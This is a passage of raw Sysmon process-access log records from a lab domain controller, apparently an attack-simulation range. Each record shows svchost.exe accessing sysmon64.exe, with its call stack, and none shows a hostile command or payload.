dll+51791 10341000x80000000000000001535Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001534Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001533Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001532Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001531Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001530Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001529Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001528Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001527Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001526Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001525Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001524Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001523Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001522Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001521Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001520Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001519Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001518Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001517Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001516Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001515Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001514Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001513Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.128{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001512Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.119{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001511Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 